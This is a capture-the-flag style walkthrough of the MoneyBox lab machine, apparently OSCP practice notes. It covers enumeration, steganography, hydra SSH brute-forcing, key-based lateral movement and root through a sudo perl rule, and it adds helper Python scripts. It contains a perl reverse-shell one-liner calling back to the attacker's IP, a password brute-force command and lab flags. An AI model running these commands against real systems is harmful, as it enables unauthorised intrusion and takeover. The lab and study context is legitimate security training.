Moneybox
June 12th, 2023
Switching to markdown format due to all the MD to OSCP report tools that exist
#Enumerate
Given target: 192.168.169.230
##Nmap
sudo nmap --open -sV -sC -p- -sT 192.168.169.230 -oN 192-168-169-230.scan
Output
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-12 15:28 GMT
Nmap scan report for 192.168.169.230
Host is up (0.071s latency).
Not shown: 64136 closed tcp ports (conn-refused), 1396 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 1093656 Feb 26 2021 trytofind.jpg
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.45.201
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 1e30ce7281e0a23d5c28888b12acfaac (RSA)
| 256 019dfafbf20637c012fc018b248f53ae (ECDSA)
|_ 256 2f34b3d074b47f8d17d237b12e32f7eb (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: MoneyBox
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
#Vulnerability Check
##FTP
Anonymous login is allowed and the only file on offer is trytofind.jpg. Grab it and check what it actually is:
ftp 192.168.169.230 21
Connected to 192.168.169.230.
220 (vsFTPd 3.0.3)
Name (192.168.169.230:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||10274|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 1093656 Feb 26 2021 trytofind.jpg
226 Directory send OK.
ftp> get trytofind.jpg
local: trytofind.jpg remote: trytofind.jpg
229 Entering Extended Passive Mode (|||46815|)
150 Opening BINARY mode data connection for trytofind.jpg (1093656 bytes).
100% |********************************| 1068 KiB 1.46 MiB/s 00:00 ETA
226 Transfer complete.
1093656 bytes received in 00:00 (1.33 MiB/s)
ftp> exit
221 Goodbye.
ls
192-168-169-230.scan trytofind.jpg
file trytofind.jpg
trytofind.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 3984x2988, components 3
gwenview trytofind.jpg
Image: https://i.imgur.com/nR5L7Gv.png
##SSH
OpenSSH 7.9p1 on Debian 10. Nothing to do here without credentials; come back to it once there is a username or a password.
##HTTP
###Apache httpd 2.4.38
searchsploit Apache 2.4
Output
------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote C | php/remote/29316.py
Apache 2.2.4 - 413 Error HTTP Request Meth | unix/remote/30835.sh
Apache 2.4.17 - Denial of Service | windows/dos/39037.php
Apache 2.4.17 < 2.4.38 - 'apache2ctl grace | linux/local/46676.php
Apache 2.4.23 mod_http2 - Denial of Servic | linux/dos/40909.py
Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal() | php/remote/40142.php
Apache 2.4.7 mod_status - Scoreboard Handl | linux/dos/34133.txt
Apache 2.4.x - Buffer Overflow | multiple/webapps/51193.py
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memor | linux/webapps/42745.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial o | multiple/dos/26710.txt
Apache HTTP Server 2.4.49 - Path Traversal | multiple/webapps/50383.sh
Apache HTTP Server 2.4.50 - Path Traversal | multiple/webapps/50406.sh
Apache HTTP Server 2.4.50 - Remote Code Ex | multiple/webapps/50446.sh
Apache HTTP Server 2.4.50 - Remote Code Ex | multiple/webapps/50512.py
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck | unix/remote/47080.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck | unix/remote/764.c
Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' | linux/webapps/39642.txt
Apache Shiro 1.2.4 - Cookie RememberME Des | multiple/remote/48410.rb
Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' | multiple/remote/21492.txt
Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' I | multiple/remote/21490.txt
Apache Tomcat 3.2.3/3.2.4 - Example Files | multiple/remote/21491.txt
Apache Tomcat < 5.5.17 - Remote Directory | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory | multiple/remote/6229.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory | unix/remote/14489.c
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / | jsp/webapps/42966.py
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / | windows/webapps/42953.txt
Apache Xerces-C XML Parser < 3.1.2 - Denia | linux/dos/36906.txt
Webfroot Shoutbox < 2.32 (Apache) - Local | linux/remote/34.pl
------------------------------------------- ---------------------------------
Shellcodes: No Results
------------------------------------------- ---------------------------------
Paper Title | Path
------------------------------------------- ---------------------------------
Apache HTTP Server 2.4.50 Path Traversal a | docs/english/50552-apache-http-s
------------------------------------------- ---------------------------------
Nothing in that list fits from the outside: the path-traversal and RCE entries are for 2.4.49 and 2.4.50 only, and 46676 (CVE-2019-0211, 2.4.17 through 2.4.38) is a local privilege escalation that needs code execution as the web user first. Debian also backports security fixes without changing the banner, so "2.4.38" on its own says nothing about what is actually patched. On to content discovery.
###Directories
gobuster dir -u http://192.168.169.230:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Output
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.169.230:80
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/12 15:39:36 Starting gobuster in directory enumeration mode
===============================================================
/blogs (Status: 301) [Size: 318] [--> http://192.168.169.230/blogs/]
/server-status (Status: 403) [Size: 280]
####http://192.168.169.230/blogs/
<html>
<head><title>MoneyBox</title></head>
<body>
<h1>I'm T0m-H4ck3r</h1><br>
<p>I Already Hacked This Box and Informed.But They didn't Do any Security configuration</p>
<p>If You Want Hint For Next Step......?<p>
</body>
</html>
<!--the hint is the another secret directory is S3cr3t-T3xt-->
####http://192.168.169.230/S3cr3t-T3xt/
<html>
<head><title>MoneyBox</title></head>
<body>
<h1>There is Nothing In this Page.........</h1>
</body>
</html>
<!..Secret Key 3xtr4ctd4t4 >
Could be an SSH password or a steg passphrase, since there is an image from FTP.
3xtr4ctd4t4 is leetspeak for "extractdata", which points at the image, but it is cheap to try as a password first (guessing the username from the box name), then go for steg.
#Exploit
##SSH
###Retrieved password attempt
ssh moneybox@192.168.169.230
3xtr4ctd4t4
No luck, and a capital M doesn't work either. Without a known username that is a dead end, so on to steg.
##Steg
Passphrase to try: 3xtr4ctd4t4
Work down the usual steg tools until one extracts something:
1. Steghide
2. Stegoshare
3. Wavsteg
4. Snow
5. Steganoroute
For a JPEG, steghide (or stegseek, which brute-forces steghide passphrases) is the realistic candidate; wavsteg is for WAV audio and snow hides data in the trailing whitespace of text files, so those do not apply to this file.
###1. Steghide
steghide extract -sf trytofind.jpg -p 3xtr4ctd4t4
wrote extracted data to "data.txt".
cat data.txt
Hello..... renu
I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......
First tool, first try. The note gives a username, renu, and says the password is weak, so skip the rest of the list and brute-force SSH for renu.
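The hint decoding above (3xtr4ctd4t4 read as leetspeak) and this steg step can be scripted together. The following is an added example, my own code rather than anything from the page: it expands a leet hint into the plain readings and casing variants a person would guess by hand, then feeds each one to steghide until an extraction succeeds. The steghide flags (-sf, -p, -xf, -f, -q) and its non-zero exit status on a wrong passphrase are the tool's real behaviour; the image name and hint are the page's; the substitution table is my own assumption.

```python
"""Expand a leetspeak hint into passphrase candidates and try each against a
steghide-protected image.  Added example for this writeup, not the page's
own tooling.  Image name and hint are from the page; the substitution table
is my own assumption."""
from __future__ import annotations

import itertools
import subprocess
from pathlib import Path

# Leet substitutions a hint might use.  Some digits have more than one
# plausible reading (1 -> l or i), so de_leet branches on those.
LEET = {
    "0": ["o"], "1": ["l", "i"], "3": ["e"], "4": ["a"], "5": ["s"],
    "7": ["t"], "8": ["b"], "@": ["a"], "$": ["s"], "!": ["i"],
}


def de_leet(hint: str) -> list[str]:
    """Every plain-text reading of a leet string, in substitution order."""
    choices = [LEET.get(ch, [ch]) for ch in hint]
    out: list[str] = []
    for combo in itertools.product(*choices):
        word = "".join(combo)
        if word not in out:
            out.append(word)
    return out


def candidates(hint: str) -> list[str]:
    """Passphrases worth trying: the literal hint, each de-leeted reading,
    and the capitalised / upper-case variants of both (the 'try it with a
    capital letter' guess made by hand above, done exhaustively)."""
    out: list[str] = []
    for word in [hint] + de_leet(hint):
        for variant in (word, word.capitalize(), word.upper()):
            if variant not in out:
                out.append(variant)
    return out


def steghide_extract(image: Path, passphrase: str, outfile: Path) -> bool:
    """One steghide run.  steghide exits non-zero when the passphrase is
    wrong, so the return code is the success signal; -f overwrites outfile."""
    proc = subprocess.run(
        ["steghide", "extract", "-sf", str(image), "-p", passphrase,
         "-xf", str(outfile), "-f", "-q"],
        capture_output=True, text=True,
    )
    return proc.returncode == 0


def try_hint(image: Path, hint: str, outfile: Path = Path("data.txt")) -> str | None:
    """Try every candidate in order; return the passphrase that worked."""
    for passphrase in candidates(hint):
        if steghide_extract(image, passphrase, outfile):
            return passphrase
    return None


if __name__ == "__main__":
    hit = try_hint(Path("trytofind.jpg"), "3xtr4ctd4t4")
    if hit:
        print(f"extracted with passphrase {hit!r}, see data.txt")
    else:
        print("no candidate worked; next step is stegseek with rockyou")
```

On this box the very first candidate is the literal hint, so the loop stops immediately; the value of the script is for the case where the hint is a transformed version of the real passphrase, or where nothing hits and the fallback is stegseek against a wordlist.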
##SSH
###Bruteforce
hydra -l renu -P /usr/share/wordlists/rockyou.txt ssh://192.168.169.230
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-12 16:10:14
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.169.230:22/
[22][ssh] host: 192.168.169.230 login: renu password: 987654321
Verify the hit by hand: hydra's SSH module does report false positives, especially at the default 16 parallel tasks (hence its own -t 4 warning), so a single reported match is not proof until a real login works.
ssh renu@192.168.169.230
renu@192.168.169.230's password:
Linux MoneyBox 4.19.0-22-amd64 #1 SMP Debian 4.19.260-1 (2022-09-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Sep 23 10:00:13 2022
renu@MoneyBox:~$ ls
ftp local.txt
renu@MoneyBox:~$ cat local.txt
6a1be9298138e1ff1514bcc04fd8737f
Now onto priv esc
#Privilege Escalation
##Sudo privileges
renu@MoneyBox:~$ sudo -l
[sudo] password for renu:
Sorry, user renu may not run sudo on MoneyBox.
No sudo rights for renu.
##File system exploring
Nothing useful in .bashrc. /home has a second user, lily. Next, SUID binaries:
renu@MoneyBox:/$ find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
-rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
-rwsr-xr-x 1 root root 34896 Apr 22 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 157192 Jan 20 2021 /usr/bin/sudo
-rwsr-xr-- 1 root messagebus 51184 Oct 10 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign
All stock Debian SUID binaries, so nothing promising there.
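To make that call systematically instead of by eye, here is an added triage script (mine, not from the page). It parses the ls -al lines from the find above and flags any SUID binary that is not in a stock-Debian baseline, is not owned by root, or is world-writable. The baseline set is my own assumption of what a default Debian 10 install ships SUID; regenerate it from a clean box of the same release when it matters. The sample listing is the one above plus two constructed entries (/usr/local/bin/backup and /opt/notes, neither of which exists on the real box) so the filter has something to catch.

```python
"""Triage a `find / -perm -4000 -type f -exec ls -al` listing.  Added
example for this writeup, not code from the page.  STOCK_DEBIAN10_SUID is
my own baseline of what a default Debian 10 install ships SUID; regenerate
it from a clean box of the same release before relying on it."""
from __future__ import annotations

from dataclasses import dataclass

STOCK_DEBIAN10_SUID = {
    "/usr/bin/passwd", "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/su",
    "/usr/bin/sudo", "/usr/bin/newgrp", "/usr/bin/chfn", "/usr/bin/chsh",
    "/usr/bin/gpasswd", "/usr/bin/fusermount", "/usr/bin/pkexec",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
}

# The listing from the box, plus two constructed lines at the end so the
# filter has something to catch (neither exists on the real box).
SAMPLE_LISTING = """\
-rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
-rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
-rwsr-xr-x 1 root root 34896 Apr 22 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 157192 Jan 20 2021 /usr/bin/sudo
-rwsr-xr-- 1 root messagebus 51184 Oct 10 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 16712 Feb 26 2021 /usr/local/bin/backup
-rwsrwxrwx 1 lily lily 8384 Feb 26 2021 /opt/notes
"""


@dataclass
class SuidEntry:
    mode: str
    owner: str
    group: str
    path: str


def parse_ls_line(line: str) -> SuidEntry | None:
    """'-rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd' -> SuidEntry.
    Fields: mode, links, owner, group, size, month, day, year/time, path...
    Lines that are not a regular-file entry (e.g. 'total 0') give None."""
    parts = line.split()
    if len(parts) < 9 or not parts[0].startswith("-"):
        return None
    # Paths may contain spaces, so re-join everything after the date.
    return SuidEntry(mode=parts[0], owner=parts[2], group=parts[3], path=" ".join(parts[8:]))


def triage(listing: str) -> dict[str, list[str]]:
    """Bucket the paths worth a second look by the reason they stand out."""
    findings: dict[str, list[str]] = {"non_stock": [], "non_root_owner": [], "world_writable": []}
    for line in listing.splitlines():
        entry = parse_ls_line(line)
        if entry is None:
            continue
        if entry.path not in STOCK_DEBIAN10_SUID:
            findings["non_stock"].append(entry.path)
        if entry.owner != "root":
            findings["non_root_owner"].append(entry.path)
        if entry.mode[8] == "w":  # 'other' write bit: anyone can replace the binary
            findings["world_writable"].append(entry.path)
    return findings


if __name__ == "__main__":
    for reason, paths in triage(SAMPLE_LISTING).items():
        print(f"{reason}: {paths or 'none'}")
```

Run it against the real listing and every bucket comes back empty, which is the "nothing promising" verdict in checkable form; a non-stock path (a custom backup helper, say) is what you would then pull apart with strings and ltrace.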
lily's home directory is readable by renu, and her .ssh/authorized_keys holds a key whose comment is renu@debian, i.e. a key pair generated as renu. authorized_keys only lists public keys, so there is nothing to dump; the point is that renu's own private key (~/.ssh/id_rsa) is trusted for lily's account, so ssh to lily from renu's shell should simply work without a password:
renu@MoneyBox:/home/lily$ cat .ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRIE9tEEbTL0A+7n+od9tCjASYAWY0XBqcqzyqb2qsNsJnBm8cBMCBNSktugtos9HY9hzSInkOzDn3RitZJXuemXCasOsM6gBctu5GDuL882dFgz962O9TvdF7JJm82eIiVrsS8YCVQq43migWs6HXJu+BNrVbcf+xq36biziQaVBy+vGbiCPpN0JTrtG449NdNZcl0FDmlm2Y6nlH42zM5hCC0HQJiBymc/I37G09VtUsaCpjiKaxZanglyb2+WLSxmJfr+EhGnWOpQv91hexXd7IdlK6hhUOff5yNxlvIVzG2VEbugtJXukMSLWk2FhnEdDLqCCHXY+1V+XEB9F3 renu@debian
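That is worth checking properly rather than by eyeballing a key comment, which anyone can edit. The script below is an added example (mine, not from the page): it parses authorized_keys entries, including any leading options such as from=... or command=..., fingerprints each key the way ssh-keygen -lf does (SHA256 over the decoded wire-format blob), reads the RSA modulus size out of the blob, and reports which entries match a public key we already hold. The ssh-rsa entry is the one shown above; renu's id_rsa.pub is constructed to be the same key, which is what the comment and the passwordless login imply but the page never shows; the ed25519 entry is a constructed non-matching control.

```python
"""Parse authorized_keys, fingerprint each key like `ssh-keygen -lf`, and
report which entries a key we hold would satisfy.  Added example for this
writeup, not the page's code.  LILY_AUTHORIZED_KEYS is the entry shown above
plus a constructed ed25519 control; RENU_ID_RSA_PUB is constructed to be the
same key as that entry (the page never shows the file itself)."""
from __future__ import annotations

import base64
import hashlib
import re
import struct
from dataclasses import dataclass

KEY_TYPES = r"ssh-rsa|ssh-ed25519|ssh-dss|ecdsa-sha2-nistp(?:256|384|521)"
# Key type at a token boundary, base64 blob, optional comment.  Anything
# before the key type is the options field (from=..., command=..., no-pty).
KEY_RE = re.compile(
    rf"(?<!\S)(?P<type>{KEY_TYPES})\s+(?P<blob>[A-Za-z0-9+/]+={{0,2}})(?:\s+(?P<comment>.*))?$"
)


def _ssh_string(data: bytes) -> bytes:
    """SSH wire-format string: uint32 big-endian length prefix + bytes."""
    return struct.pack(">I", len(data)) + data


def _ssh_strings(blob: bytes) -> list[bytes]:
    """Split a public-key blob into its length-prefixed fields."""
    fields, off = [], 0
    while off + 4 <= len(blob):
        (n,) = struct.unpack(">I", blob[off:off + 4])
        fields.append(blob[off + 4:off + 4 + n])
        off += 4 + n
    return fields


@dataclass
class AuthorizedKey:
    key_type: str
    blob: bytes
    comment: str
    options: str

    @property
    def fingerprint(self) -> str:
        """OpenSSH's default fingerprint: SHA256 of the blob, base64 without padding."""
        digest = hashlib.sha256(self.blob).digest()
        return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

    @property
    def bits(self) -> int | None:
        """RSA modulus size in bits (blob fields are: type, e, n); None otherwise."""
        if self.key_type != "ssh-rsa":
            return None
        modulus = _ssh_strings(self.blob)[2].lstrip(b"\x00")
        return (len(modulus) - 1) * 8 + modulus[0].bit_length()


def parse_authorized_keys(text: str) -> list[AuthorizedKey]:
    """One AuthorizedKey per valid line; blank lines, comments and junk are skipped."""
    keys = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_RE.search(line)
        if m is None:
            continue
        keys.append(AuthorizedKey(
            key_type=m["type"],
            blob=base64.b64decode(m["blob"]),
            comment=m["comment"] or "",
            options=line[:m.start()].strip(),
        ))
    return keys


def matching_keys(authorized_keys: str, our_pubkeys: list[str]) -> list[AuthorizedKey]:
    """authorized_keys entries whose fingerprint equals one of our public keys."""
    ours = {k.fingerprint for k in parse_authorized_keys("\n".join(our_pubkeys))}
    return [k for k in parse_authorized_keys(authorized_keys) if k.fingerprint in ours]


# The blob from /home/lily/.ssh/authorized_keys as shown on the page.
RENU_KEY_BLOB = (
    "AAAAB3NzaC1yc2EAAAADAQABAAABAQDRIE9tEEbTL0A+7n+od9tCjASYAWY0XBqcqzyqb2qsNsJnBm8cBMCBNSktugtos9HY9hzS"
    "InkOzDn3RitZJXuemXCasOsM6gBctu5GDuL882dFgz962O9TvdF7JJm82eIiVrsS8YCVQq43migWs6HXJu+BNrVbcf+xq36biziQ"
    "aVBy+vGbiCPpN0JTrtG449NdNZcl0FDmlm2Y6nlH42zM5hCC0HQJiBymc/I37G09VtUsaCpjiKaxZanglyb2+WLSxmJfr+EhGnWO"
    "pQv91hexXd7IdlK6hhUOff5yNxlvIVzG2VEbugtJXukMSLWk2FhnEdDLqCCHXY+1V+XEB9F3"
)
# Constructed control entry: a syntactically valid ed25519 key with options,
# which no key we hold should match.
_OTHER_BLOB = base64.b64encode(_ssh_string(b"ssh-ed25519") + _ssh_string(bytes(range(32)))).decode()

LILY_AUTHORIZED_KEYS = (
    f"ssh-rsa {RENU_KEY_BLOB} renu@debian\n"
    f'from="10.0.0.5",no-pty ssh-ed25519 {_OTHER_BLOB} other@constructed\n'
)
# Constructed: renu's ~/.ssh/id_rsa.pub, assumed to be the same key.
RENU_ID_RSA_PUB = f"ssh-rsa {RENU_KEY_BLOB} renu@debian"

if __name__ == "__main__":
    for k in parse_authorized_keys(LILY_AUTHORIZED_KEYS):
        print(f"{k.key_type:12} {k.bits or '-':>5} {k.fingerprint} {k.comment!r} options={k.options!r}")
    for k in matching_keys(LILY_AUTHORIZED_KEYS, [RENU_ID_RSA_PUB]):
        print(f"we hold the private half of: {k.fingerprint} ({k.comment})")
```

Comparing fingerprints rather than comments is the honest test: the comment is free text, while the fingerprint is derived from the key material that sshd actually checks. The same parser is also what you would point at every authorized_keys you can read during post-exploitation to map which accounts trust which keys.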
renu@MoneyBox:/home/lily$ ssh lily@localhost
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
Linux MoneyBox 4.19.0-22-amd64 #1 SMP Debian 4.19.260-1 (2022-09-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 09:07:47 2021 from 192.168.43.80
lily@MoneyBox:~$
Now to check what she can run
lily@MoneyBox:~$ sudo -l
Matching Defaults entries for lily on MoneyBox:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lily may run the following commands on MoneyBox:
(ALL : ALL) NOPASSWD: /usr/bin/perl
So she can run perl as root without a password. The GTFOBins move is to exec a shell from perl under sudo.
lily@MoneyBox:~$ perl -e 'exec "/bin/bash";'
lily@MoneyBox:~$ sudo !!
sudo exit
[sudo] password for lily:
Sorry, try again.
That failed for two reasons: the perl line ran without sudo, so the bash it exec'd was just another lily shell, and inside that fresh shell !! expanded to exit, the last entry in its history, rather than the perl command. sudo exit is not covered by the NOPASSWD rule for /usr/bin/perl, hence the password prompt. The direct form would be sudo /usr/bin/perl -e 'exec "/bin/bash";'. Rather than fight the history expansion I'll go for a reverse shell.
Set up the listener:
nc -nlvp 4444
My IP on the VPN:
ip route | grep tun
192.168.45.0/24 dev tun0 proto kernel scope link src 192.168.45.201
192.168.169.0/24 via 192.168.45.254 dev tun0
Reverse shell one-liner in perl:
perl -e 'use Socket;$i="192.168.45.201";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Run it under sudo (sudo /usr/bin/perl -e '...'), since that is exactly what lily can run as root without a password; without sudo the shell that comes back is just lily's.
nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.201] from (UNKNOWN) [192.168.169.230] 46150
# whoami
root
# ls
# cd
# ls
proof.txt
# cat proof
cat: proof: No such file or directory
# cat proof.txt
80ba0c566d8598739895252de4e0f324
Boot2Root